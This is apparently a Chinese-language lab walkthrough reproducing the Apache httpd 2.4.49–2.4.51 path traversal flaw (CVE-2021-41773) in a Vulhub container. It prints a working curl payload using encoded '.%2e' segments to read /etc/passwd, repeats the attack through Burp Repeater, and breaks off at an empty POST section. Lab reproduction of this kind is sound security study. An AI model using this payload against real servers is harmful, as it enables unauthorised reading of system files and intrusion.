目录
漏洞描述
漏洞复现具体步骤:
用burp复现:
Get:
Post:
漏洞描述
目录穿越比目录浏览、目录遍历更具破坏性,目录穿越不仅可以读取服务器中任何目录及任何文件的内容,还可以执行系统命令。
漏洞等级:高危
影响版本:
Apache httpd 2.4.49-2.4.51
准备阶段:
环境:win7虚拟机(装有BP) kali(装有最新的docker vulhub)
漏洞复现具体步骤:
1.进入Vulhub目录中启动存在漏洞的Apache 服务器
/home/kali/vulhub/httpd/CVE-2021-41773/
2.win7访问Apache 默认的It works!页面
3.漏洞利用
使用如下CURL命令来发送Payload---/icons/必须是一个存在且可以访问的目录
curl -v --path-as-is http://192.168.132.10:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
可以看到已经把当前系统里的/etc/passwd里的内容已经扫出来了
用burp复现:
Get:
http://192.168.132.10:8080/icons/ 将此url 在repeater里面右键改为request请求
点击send出现下图
将.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 拼接在后面
Post:
Id:
Pwd:
